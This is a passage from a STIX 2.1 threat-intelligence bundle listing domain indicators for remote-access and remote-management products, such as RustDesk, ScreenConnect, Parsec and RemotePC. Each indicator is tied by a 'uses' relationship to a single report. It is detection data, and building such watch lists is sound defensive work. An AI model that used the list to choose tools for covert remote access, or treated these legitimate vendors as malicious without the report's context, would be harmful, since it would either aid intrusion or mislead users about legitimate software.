    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--0781ec49-93b8-50c2-85a8-0d8501d65ee5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: parsec.app",
      "pattern": "[domain-name:value = 'parsec.app']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--585b46ff-c820-5524-a4f4-a7107f446a2d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--0781ec49-93b8-50c2-85a8-0d8501d65ee5"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--6f8d1449-d533-5615-82b6-dd72aa4a276b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: parsecusercontent.com",
      "pattern": "[domain-name:value = 'parsecusercontent.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f29413cf-c66b-55dd-9122-df3f0495dfcb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--6f8d1449-d533-5615-82b6-dd72aa4a276b"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--f3b17251-2dd0-5f7d-b95c-bf2584fb5d9c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: pcvisit.de",
      "pattern": "[domain-name:value = 'pcvisit.de']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d7e7e183-0b63-5352-bcd4-c5980fec7d57",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--f3b17251-2dd0-5f7d-b95c-bf2584fb5d9c"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--faccd797-e084-5654-b84e-ded125ab80cf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: pilixo.com",
      "pattern": "[domain-name:value = 'pilixo.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9cfe3388-1ab2-5d30-a6a0-a9a4d1ee9ce1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--faccd797-e084-5654-b84e-ded125ab80cf"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--ef2583ee-db4a-5437-92d9-266d632c0f0b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: playanext.com",
      "pattern": "[domain-name:value = 'playanext.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3c5612c6-67a8-5c92-b5ab-79cf34fb812d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--ef2583ee-db4a-5437-92d9-266d632c0f0b"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--1eef8ad9-d9ae-56be-9b77-29f33ce5aa2a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: pulseway.com",
      "pattern": "[domain-name:value = 'pulseway.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--16a03ab5-f561-5676-8a11-b68029146dbf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--1eef8ad9-d9ae-56be-9b77-29f33ce5aa2a"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--f7c04296-c54c-5e6f-b084-b69e5b76af7a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: qetqo.com",
      "pattern": "[domain-name:value = 'qetqo.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5f93f9ab-e43f-5e62-8bc7-b4a35eadce6d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--f7c04296-c54c-5e6f-b084-b69e5b76af7a"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--d1adc7d0-5caf-5b3c-80f1-f2219c67b6e9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: r-hud.net",
      "pattern": "[domain-name:value = 'r-hud.net']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e4dd251a-e3e9-5977-bd01-98eee3f6e018",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--d1adc7d0-5caf-5b3c-80f1-f2219c67b6e9"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--4b056394-f4c8-5d6a-8cf4-6fa82c80a626",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: real-time-collaboration.com",
      "pattern": "[domain-name:value = 'real-time-collaboration.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--630ca129-4d44-5fb4-93eb-9d13630c3b40",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--4b056394-f4c8-5d6a-8cf4-6fa82c80a626"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--cbf318a2-090e-5360-970e-b3e0a3f9ba17",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: remmon.hu",
      "pattern": "[domain-name:value = 'remmon.hu']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8ed3bc35-99b5-5164-8c8b-6969294fa822",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--cbf318a2-090e-5360-970e-b3e0a3f9ba17"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--be303d9a-0621-578a-a013-75d4abd17f20",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: remote.it",
      "pattern": "[domain-name:value = 'remote.it']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9f7b5ba7-f98c-5114-9c76-50a70b6fcd6e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--be303d9a-0621-578a-a013-75d4abd17f20"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--7abe279c-bd97-5fc7-98c4-35d0b4705d5a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: remote.management",
      "pattern": "[domain-name:value = 'remote.management']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--746f7f7e-a24b-5fd8-b86f-57c17e76e17b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--7abe279c-bd97-5fc7-98c4-35d0b4705d5a"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--6fa74d74-df87-5db3-9d7e-7cfeedd04677",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: remotecall.com",
      "pattern": "[domain-name:value = 'remotecall.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--94351357-50cc-586a-a752-2c2da7879c35",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--6fa74d74-df87-5db3-9d7e-7cfeedd04677"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--c82b01f8-69dd-5607-aae5-83137492b9c1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: remotedesktop.com",
      "pattern": "[domain-name:value = 'remotedesktop.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--86a7c9dc-0569-5cf2-80c9-2fdd84dce999",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--c82b01f8-69dd-5607-aae5-83137492b9c1"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--9572c660-f5d6-56a9-a19e-e111f2e35602",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: remotepc.com",
      "pattern": "[domain-name:value = 'remotepc.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--67a047f1-e215-5ac3-b174-dd6ffce74cd5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--9572c660-f5d6-56a9-a19e-e111f2e35602"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--0e078407-c041-5a9d-ac69-04030d0a890f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: remotetopc.com",
      "pattern": "[domain-name:value = 'remotetopc.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--2cd500cd-c2cb-5100-a49e-a9bf158dcf00",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--0e078407-c041-5a9d-ac69-04030d0a890f"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--cac3950b-4c9e-5672-b8ae-aef143a71551",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: remoteutilities.com",
      "pattern": "[domain-name:value = 'remoteutilities.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c0c49643-bb4a-53dd-8172-726b214a7265",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--cac3950b-4c9e-5672-b8ae-aef143a71551"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--c0b8f512-2972-5ae9-b8ed-b4f9c70abc54",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: remotix.com",
      "pattern": "[domain-name:value = 'remotix.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5df977ad-d67c-502a-8bfa-075ca4d6666b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--c0b8f512-2972-5ae9-b8ed-b4f9c70abc54"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--352c2fb9-cddc-57a1-828b-a61eaf58d99a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: remotly.com",
      "pattern": "[domain-name:value = 'remotly.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--224d4f6c-1ee6-52b4-93c6-f9041656173f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--352c2fb9-cddc-57a1-828b-a61eaf58d99a"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--3bc7f418-2a37-5aeb-8de7-38ddc75cce80",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: repairshopr.com",
      "pattern": "[domain-name:value = 'repairshopr.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--76f8f8c4-3090-5e7c-8782-128b976dbd9e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--3bc7f418-2a37-5aeb-8de7-38ddc75cce80"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--6b5210bc-3866-5071-8fe0-fc781b8e83fd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: rmansys.ru",
      "pattern": "[domain-name:value = 'rmansys.ru']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--595d718b-1948-58be-b102-9740c12b4095",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--6b5210bc-3866-5071-8fe0-fc781b8e83fd"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--6094a6a7-710e-5627-8736-52c37e17717f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: rmmservice.ca",
      "pattern": "[domain-name:value = 'rmmservice.ca']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5d87e3c7-28e8-5641-ab00-b97526b264c5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--6094a6a7-710e-5627-8736-52c37e17717f"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--79e517b5-fcd2-53df-a85d-354277f7578e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: rmmservice.eu",
      "pattern": "[domain-name:value = 'rmmservice.eu']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--29641c30-665b-5aed-9df6-2aea97efe65c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--79e517b5-fcd2-53df-a85d-354277f7578e"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--ddbdb8d8-63ac-51cc-833b-480bc248ba86",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: royalapps.com",
      "pattern": "[domain-name:value = 'royalapps.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--70b286de-ed79-599b-8ccf-d6524d159743",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--ddbdb8d8-63ac-51cc-833b-480bc248ba86"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--f1da3b24-7472-5158-a8ad-c11e83d35d68",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: rport.io",
      "pattern": "[domain-name:value = 'rport.io']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--35917ef0-99f1-51ac-970f-6e7e447006ad",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--f1da3b24-7472-5158-a8ad-c11e83d35d68"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--74b56964-999f-5bbc-939a-4c6d2d92ba3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: rudesktop.ru",
      "pattern": "[domain-name:value = 'rudesktop.ru']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ac11889f-5c00-5926-97d2-e62534ad1740",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--74b56964-999f-5bbc-939a-4c6d2d92ba3d"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--57066203-f015-5890-982b-780a1b8a87f9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: rustdesk.com",
      "pattern": "[domain-name:value = 'rustdesk.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8a35788b-282e-5dee-88c3-932ca7665277",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--57066203-f015-5890-982b-780a1b8a87f9"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--70721f6f-75ad-5826-a612-ddba745f25e2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: rview.com",
      "pattern": "[domain-name:value = 'rview.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--4cbdac29-2002-52f2-a013-9176f1f76faa",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--70721f6f-75ad-5826-a612-ddba745f25e2"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--8f661d70-6ff7-54a1-8c37-609dfcd30ffd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: screenconnect.com",
      "pattern": "[domain-name:value = 'screenconnect.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--12546c3b-b7ad-52fc-ae0f-1412e3a6a8ad",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--8f661d70-6ff7-54a1-8c37-609dfcd30ffd"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--516e6530-9e67-5a5c-89fa-a7a816c55b75",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: screenmeet.com",
      "pattern": "[domain-name:value = 'screenmeet.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--aaa5eb16-f218-55a9-887f-38be293d7a7c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--516e6530-9e67-5a5c-89fa-a7a816c55b75"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--21b74013-442e-5a85-b87a-3da987bf9e7a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: scrn.mt",
      "pattern": "[domain-name:value = 'scrn.mt']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--83c96d54-8be0-5bae-b33e-e492966735d6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--21b74013-442e-5a85-b87a-3da987bf9e7a"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--67cde76b-f65b-558d-925c-3fed3373318e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: servably.com",
      "pattern": "[domain-name:value = 'servably.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--fb3fc01d-0dc8-5b49-83ba-2b447eb55975",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--67cde76b-f65b-558d-925c-3fed3373318e"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--ee075266-c026-506e-ae5b-437911218e6c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: server-eye.de",
      "pattern": "[domain-name:value = 'server-eye.de']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3e893299-4885-5639-b2f7-5a76f1a0db7b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--ee075266-c026-506e-ae5b-437911218e6c"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--8e145538-4aa5-532a-9941-ad5901ec8695",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: set.me",
      "pattern": "[domain-name:value = 'set.me']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--dc9153dc-4ed4-5dc9-aaec-fdf00a2fa3a3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--8e145538-4aa5-532a-9941-ad5901ec8695"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--262b9e42-f18e-5349-b2d2-c2453ce7adfd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: setme.net",
      "pattern": "[domain-name:value = 'setme.net']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--0796b789-61ba-5c87-b484-7953c4c358a4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--262b9e42-f18e-5349-b2d2-c2453ce7adfd"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--a0fa549d-45bb-5e2c-a292-cc7298ea517d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: showmypc.com",
      "pattern": "[domain-name:value = 'showmypc.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8ac5dbcc-3f15-5ec4-97ec-f07b29b2f84b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--a0fa549d-45bb-5e2c-a292-cc7298ea517d"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--2152278c-5b08-53ea-8116-cc29ee386c90",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: signalserver.xyz",
      "pattern": "[domain-name:value = 'signalserver.xyz']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--27db4116-bd8e-5a22-a999-6f3893f029c1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--2152278c-5b08-53ea-8116-cc29ee386c90"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--ec5dda66-2617-5605-8ac0-b53fcd9e20ea",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: simple-help.com",
      "pattern": "[domain-name:value = 'simple-help.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:01:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a19a6f65-c401-5d07-a6c5-16c11fc7e5ed",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b54d0c1-1648-55a2-bf98-f1559ec252ec",
      "target_ref": "indicator--ec5dda66-2617-5605-8ac0-b53fcd9e20ea"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--2be5b56d-ca69-5fa4-97d3-1ba951708352",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: skyfex.com",
      "pattern": "[domain-name:value = 'skyfex.com']",
      "pattern_type": "stix",
